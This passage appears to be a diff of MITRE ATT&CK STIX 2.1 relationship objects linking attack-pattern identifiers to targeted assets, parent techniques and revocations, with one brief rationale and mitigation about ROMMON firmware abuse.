"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3be9d897-5a20-4e2f-8b73-2a69256925b0", + "created": "2020-10-02T16:50:12.902Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968", + "target_ref": "attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3c146b6a-eea1-498b-9fef-2695907d0d9e", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3c1adeb6-8b0e-42df-a452-1b538eeafc59", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3c240a97-606f-42c1-9a95-18f32d5b7fd1", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3c299b99-3e1e-4c39-b6c7-6ad21fd199b6", + "created": "2024-06-27T08:59:36.359Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:59:36.359Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cff94884-3b1c-4987-a70b-6d5643c621c3", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3c300c90-761f-4dbc-b539-4e80401190af", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3c4f7273-4d54-485c-a243-6c939041e9cf", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3c5e1b6b-7aec-46ac-bb73-d0b38ca60c21", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--51ea26b1-ff1e-4faa-b1a0-1114cd298c87", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3c6b30f6-5a1c-4a7d-ab91-5101c4679356", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3c76c862-dfd6-4c60-a961-b0625f7b8501", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3c7e63c8-df88-4a8d-bc7a-e7319a2ebf63", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3c839b0b-493c-4173-a820-5624a08538fd", + "created": "2024-05-22T17:08:56.346Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T01:27:24.547Z", + "description": "Asset Mapping Rationale: Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. Mitigation: Network intrusion detection and prevention systems that use network signatures to identify traffic for specific protocols, such as TFTP, can be used to mitigate activity at the network level.", + "relationship_type": "targets", + "source_ref": "attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3c8ac439-c3ce-48d7-a7df-22282840b3c3", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3c964938-f208-4005-8495-33b81a2c881e", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3caf92fb-aa08-4a48-8e69-e31eb0fd0f9e", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3d131e85-111d-4df2-ba93-274acba5146f", + "created": "2020-02-05T14:18:21.951Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--6ff403bc-93e3-48be-8687-e102fdba8c88", + "target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3d16dbff-d1fc-42e0-b736-69ddee747ffe", + "created": "2020-03-14T23:12:18.657Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", + "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3d1943bd-a690-4b41-bbdb-09dff5b027bb", + "created": "2024-06-26T15:41:03.451Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:41:03.451Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3d319308-470c-44b9-be70-78de3de5a7ee", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3d3c5d24-be5c-42e8-98ca-3b04382df39a", + "created": "2023-09-28T21:26:11.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:26:11.506Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3d42c619-ea10-4ef3-aa57-339640d90003", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3d51d7b2-918f-41e0-aa3f-9aea2857025a", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3d575a3c-1048-4ce8-ae5e-c32891cd214c", + "created": "2024-06-21T14:12:20.275Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.275Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3d77a239-fad2-414c-887c-fefd35c46b87", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3d784d79-7e84-4760-88d4-78039fbb4de4", + "created": "2020-03-11T14:13:43.032Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720", + "target_ref": "attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3d8ab290-c3fb-4a0e-aaf6-d783fccfdbb7", + "created": "2023-03-30T22:45:03.539Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T22:45:03.539Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--90c4a591-d02d-490b-92aa-619d9701ac04", + "target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3daad92f-90c4-450c-965a-aa921da4792f", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3db21d39-c143-4a16-adb8-a20d1115fc39", + "created": "2020-03-09T17:07:57.480Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--613d08bc-e8f4-4791-80b0-c8b974340dfd", + "target_ref": "attack-pattern--51ea26b1-ff1e-4faa-b1a0-1114cd298c87", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3dd15958-b159-4d01-b3c2-37bdf9b417b5", + "created": "2023-09-29T17:05:08.346Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:05:08.346Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3dd34032-bef9-4dec-bed4-77b670c70453", + "created": "2023-07-10T16:37:17.724Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-07-10T16:37:17.724Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--6fa224c7-5091-4595-bf15-3fc9fe2f2c7c", + "target_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3dd35c9a-146d-4370-80ac-69fed35d81a1", + "created": "2023-09-29T16:44:16.391Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:44:16.391Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3df66e66-705d-444e-8b56-e2aeeafe74f7", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3e1681f8-f396-4d40-abd1-e823ab418acf", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3e24f01c-3af8-4dde-9200-4f69fecb3156", + "created": "2020-02-11T20:35:32.284Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--b39d03cb-7b98-41c4-a878-c40c1a913dc0", + "target_ref": "attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3e2ca5c5-2e5c-4e8a-98c4-0455cea56a88", + "created": "2020-02-05T15:08:06.019Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--519630c5-f03f-4882-825c-3af924935817", + "target_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3e4568c7-c442-4377-a956-0186c2edaf5d", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3e62d2eb-f972-41d5-819a-75f8c8de1550", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3e8da59e-7c85-41e2-996e-b50864a98a59", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": 